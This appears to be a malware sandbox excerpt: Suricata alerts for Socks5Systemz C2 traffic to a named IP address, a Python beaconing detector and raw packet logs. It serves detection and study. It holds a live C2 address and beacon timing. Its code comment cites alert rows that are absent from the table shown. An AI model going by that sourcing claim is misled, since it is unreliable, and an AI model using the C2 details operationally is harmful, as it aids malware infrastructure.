2024-12-14T03:08:32.348769+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49825 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:33.923562+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49828 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:33.923562+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49828 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:35.504852+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49834 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:35.504852+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49834 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:37.096939+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49839 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:37.096939+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49839 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:38.687703+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49844 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:38.687703+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49844 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:40.308518+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49847 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:40.308518+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49847 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:41.915277+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49852 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:41.915277+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49852 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:43.485288+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49858 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:43.485288+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49858 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:45.064366+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49861 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:45.064366+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49861 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:46.673589+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49865 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:46.673589+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49865 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:48.257697+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49870 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:48.257697+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49870 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:48.858160+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49870 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:48.858160+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49870 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:50.475692+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49876 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:50.475692+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49876 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:51.087120+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49876 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:51.087120+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49876 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:51.699334+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49876 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:51.699334+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49876 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:53.287005+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49883 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:53.287005+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49883 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:54.907769+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49887 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:54.907769+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49887 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:56.492651+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49893 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:56.492651+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49893 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:58.069074+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49895 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:58.069074+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49895 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:59.653727+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49899 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:59.653727+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49899 | 94.232.249.187 | 80 | TCP
2024-12-14T03:09:01.288045+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49905 | 94.232.249.187 | 80 | TCP
2024-12-14T03:09:01.288045+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49905 | 94.232.249.187 | 80 | TCP
2024-12-14T03:09:02.868923+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49909 | 94.232.249.187 | 80 | TCP
2024-12-14T03:09:02.868923+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49909 | 94.232.249.187 | 80 | TCP
2024-12-14T03:09:04.512597+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49913 | 94.232.249.187 | 80 | TCP
2024-12-14T03:09:04.512597+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49913 | 94.232.249.187 | 80 | TCP
2024-12-14T03:09:09.445534+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49923 | 94.232.249.187 | 80 | TCP
2024-12-14T03:09:09.445534+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49923 | 94.232.249.187 | 80 | TCP
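The alert table shows the same two ET MALWARE rules firing on every C2 request, with a fresh client connection (new source port) roughly every 1.6 seconds. The block below is an added example, not Joe Sandbox or ANY.RUN code: it parses Suricata fast.log lines and measures that periodicity per (source, destination, destination port), collapsing the M1/M2 pair and repeated requests over one kept-alive connection into a single connection before computing inter-connection intervals and a robust jitter figure (median absolute deviation divided by the median). The sample lines are constructed from the timestamps and ports in the table; the rule revision, the classification text and the thresholds (at least 8 connections, jitter at most 0.2) are assumptions.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Suricata fast.log record:
# <ts>  [**] [gid:sid:rev] <msg> [**] [Classification: ...] [Priority: n] {PROTO} src:sport -> dst:dport
FASTLOG = re.compile(
    r"^(?P<ts>\d{2}/\d{2}/\d{4}-\d{2}:\d{2}:\d{2}\.\d+)\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.*?)\s+\[\*\*\]"
    r".*?\[Priority:\s*(?P<prio>\d+)\]\s+\{(?P<proto>\w+)\}\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def parse_fastlog(text: str) -> list:
    """Parse fast.log lines into dicts; lines that are not alerts are skipped."""
    alerts = []
    for line in text.splitlines():
        m = FASTLOG.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        alerts.append({
            "ts": datetime.strptime(d["ts"], "%m/%d/%Y-%H:%M:%S.%f"),
            "sid": int(d["sid"]), "msg": d["msg"], "priority": int(d["prio"]),
            "proto": d["proto"], "src": d["src"], "sport": int(d["sport"]),
            "dst": d["dst"], "dport": int(d["dport"]),
        })
    return alerts


def beacon_stats(alerts: list, min_connections: int = 8, max_jitter: float = 0.2) -> dict:
    """Per (src, dst, dport): first-seen time of each distinct client connection (distinct
    source port), the intervals between them, and MAD/median as a jitter estimate.
    Two SIDs on one request and several requests on one connection count once."""
    first_seen = defaultdict(dict)
    for a in alerts:
        ports = first_seen[(a["src"], a["dst"], a["dport"])]
        if a["sport"] not in ports or a["ts"] < ports[a["sport"]]:
            ports[a["sport"]] = a["ts"]
    results = {}
    for key, ports in first_seen.items():
        times = sorted(ports.values())
        intervals = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if len(intervals) < 2:
            results[key] = {"connections": len(times), "beaconing": False}
            continue
        med = statistics.median(intervals)
        mad = statistics.median([abs(x - med) for x in intervals])
        jitter = mad / med if med else float("inf")
        results[key] = {
            "connections": len(times), "median_interval": med, "jitter": jitter,
            "beaconing": len(times) >= min_connections and jitter <= max_jitter,
        }
    return results


def _line(ts, sid, variant, sport):
    # Constructed fast.log line; the classification text and rev=1 are assumptions.
    return (f"{ts}  [**] [1:{sid}:1] ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection "
            f"{variant} [**] [Classification: A Network Trojan was detected] [Priority: 1] "
            f"{{TCP}} 192.168.2.4:{sport} -> 94.232.249.187:80")


# Timestamps and source ports taken from the alert table above (first 12 M1 rows);
# the second line repeats the first request under the M2 rule, and port 49759 appears twice.
SAMPLE_FASTLOG = "\n".join([
    _line("12/14/2024-03:07:57.978929", 2049467, "M1", 49736),
    _line("12/14/2024-03:07:57.978929", 2049468, "M2", 49736),
    _line("12/14/2024-03:08:00.205019", 2049467, "M1", 49737),
    _line("12/14/2024-03:08:01.785416", 2049467, "M1", 49740),
    _line("12/14/2024-03:08:03.392194", 2049467, "M1", 49741),
    _line("12/14/2024-03:08:05.001033", 2049467, "M1", 49747),
    _line("12/14/2024-03:08:06.577197", 2049467, "M1", 49753),
    _line("12/14/2024-03:08:08.166473", 2049467, "M1", 49759),
    _line("12/14/2024-03:08:08.772181", 2049467, "M1", 49759),
    _line("12/14/2024-03:08:10.951577", 2049467, "M1", 49765),
    _line("12/14/2024-03:08:12.526162", 2049467, "M1", 49771),
    _line("12/14/2024-03:08:14.702136", 2049467, "M1", 49777),
    _line("12/14/2024-03:08:16.282067", 2049467, "M1", 49778),
])

if __name__ == "__main__":
    for key, st in beacon_stats(parse_fastlog(SAMPLE_FASTLOG)).items():
        print(key, st)
```

On live data, feed the whole fast.log and look at every key that reaches the connection threshold with low jitter; a long-lived kept-alive session that issues many requests shows up as one connection here, which is why the interval is measured between connections rather than between alerts.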
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 14, 2024 03:07:56.507107973 CET | 49736 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:07:56.627042055 CET | 80 | 49736 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:07:56.627180099 CET | 49736 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:07:56.630903959 CET | 49736 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:07:56.750608921 CET | 80 | 49736 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:07:57.978707075 CET | 80 | 49736 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:07:57.978929043 CET | 49736 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:07:58.085033894 CET | 49736 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:07:58.205084085 CET | 80 | 49736 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:07:58.607819080 CET | 80 | 49736 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:07:58.608004093 CET | 49736 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:07:58.725421906 CET | 49736 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:07:58.725706100 CET | 49737 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:07:58.845449924 CET | 80 | 49737 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:07:58.845565081 CET | 80 | 49736 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:07:58.845613003 CET | 49736 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:07:58.845668077 CET | 49737 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:07:58.845885038 CET | 49737 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:07:58.965558052 CET | 80 | 49737 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:00.204941988 CET | 80 | 49737 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:00.205018997 CET | 49737 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:00.319219112 CET | 49737 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:00.319541931 CET | 49740 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:00.439318895 CET | 80 | 49740 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:00.439333916 CET | 80 | 49737 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:00.439521074 CET | 49737 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:00.439564943 CET | 49740 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:00.439666986 CET | 49740 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:00.559418917 CET | 80 | 49740 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:01.785357952 CET | 80 | 49740 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:01.785415888 CET | 49740 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:01.934855938 CET | 49740 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:01.935141087 CET | 49741 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:02.056092978 CET | 80 | 49740 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:02.056134939 CET | 80 | 49741 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:02.056221008 CET | 49740 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:02.056271076 CET | 49741 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:02.067209959 CET | 49741 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:02.187127113 CET | 80 | 49741 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:03.392119884 CET | 80 | 49741 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:03.392194033 CET | 49741 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:03.506623030 CET | 49741 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:03.506942987 CET | 49747 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:03.626790047 CET | 80 | 49747 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:03.626802921 CET | 80 | 49741 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:03.626874924 CET | 49747 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:03.626920938 CET | 49741 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:03.627127886 CET | 49747 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:03.746856928 CET | 80 | 49747 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:05.000874043 CET | 80 | 49747 | 94.232.249.187 | 192.168.2.4
                                                                            Dec 14, 2024 03:08:05.001033068 CET4974780192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:05.119566917 CET4974780192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:05.120376110 CET4975380192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:05.239905119 CET804974794.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:05.240082026 CET804975394.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:05.240082026 CET4974780192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:05.240374088 CET4975380192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:05.240509033 CET4975380192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:05.360191107 CET804975394.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:06.576967001 CET804975394.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:06.577197075 CET4975380192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:06.694158077 CET4975380192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:06.694416046 CET4975980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:06.823376894 CET804975994.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:06.823424101 CET804975394.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:06.823482037 CET4975980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:06.823514938 CET4975380192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:06.823694944 CET4975980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:06.943408966 CET804975994.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:08.166342974 CET804975994.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:08.166472912 CET4975980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:08.273379087 CET4975980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:08.396245003 CET804975994.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:08.771872044 CET804975994.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:08.772181034 CET4975980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:08.881850958 CET4975980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:09.001867056 CET804975994.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:09.377691984 CET804975994.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:09.377875090 CET4975980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:09.491156101 CET4975980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:09.491456032 CET4976580192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:09.611279011 CET804976594.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:09.611371040 CET4976580192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:09.611392021 CET804975994.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:09.611460924 CET4975980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:09.611638069 CET4976580192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:09.731666088 CET804976594.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:10.951509953 CET804976594.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:10.951576948 CET4976580192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:11.069185019 CET4976580192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:11.069458961 CET4977180192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:11.189228058 CET804977194.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:11.189392090 CET4977180192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:11.189446926 CET804976594.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:11.189537048 CET4976580192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:11.189832926 CET4977180192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:11.310746908 CET804977194.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:12.526029110 CET804977194.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:12.526161909 CET4977180192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:12.631575108 CET4977180192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:12.751501083 CET804977194.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:13.123840094 CET804977194.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:13.123974085 CET4977180192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:13.241125107 CET4977180192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:13.241362095 CET4977780192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:13.361149073 CET804977794.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:13.361218929 CET4977780192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:13.361315966 CET804977194.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:13.361378908 CET4977180192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:13.361428022 CET4977780192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:13.481213093 CET804977794.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:14.702039003 CET804977794.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:14.702136040 CET4977780192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:14.819149017 CET4977780192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:14.819494009 CET4977880192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:14.939249039 CET804977894.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:14.939306974 CET804977794.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:14.939342022 CET4977880192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:14.939378023 CET4977780192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:14.939625025 CET4977880192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:15.059228897 CET804977894.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:16.281989098 CET804977894.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:16.282067060 CET4977880192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:16.397253036 CET4977880192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:16.397522926 CET4978480192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:16.519840002 CET804977894.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:16.519886971 CET804978494.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:16.519943953 CET4977880192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:16.520008087 CET4978480192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:16.520201921 CET4978480192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:16.639944077 CET804978494.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:17.856797934 CET804978494.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:17.856915951 CET4978480192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:17.975390911 CET4978480192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:17.975653887 CET4979080192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:18.095921040 CET804979094.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:18.096015930 CET804978494.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:18.096020937 CET4979080192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:18.096080065 CET4978480192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:18.096235991 CET4979080192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:18.216360092 CET804979094.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:19.440357924 CET804979094.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:19.440462112 CET4979080192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:19.553626060 CET4979080192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:19.553961039 CET4979280192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:19.673765898 CET804979294.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:19.673825979 CET804979094.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:19.674061060 CET4979080192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:19.674396038 CET4979280192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:19.674396992 CET4979280192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:19.794229984 CET804979294.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:21.022746086 CET804979294.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:21.022814035 CET4979280192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:21.131854057 CET4979280192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:21.251682043 CET804979294.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:21.623733044 CET804979294.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:21.623810053 CET4979280192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:21.740921021 CET4979280192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:21.741219044 CET4979880192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:21.860882998 CET804979294.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:21.860975981 CET804979894.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:21.860994101 CET4979280192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:21.861040115 CET4979880192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:21.861186981 CET4979880192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:21.996864080 CET804979894.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:23.211982012 CET804979894.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:23.212063074 CET4979880192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:23.319390059 CET4979880192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:23.439181089 CET804979894.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:23.811348915 CET804979894.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:23.811479092 CET4979880192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:23.928683996 CET4979880192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:23.929032087 CET4980480192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:24.048762083 CET804979894.232.249.187192.168.2.4
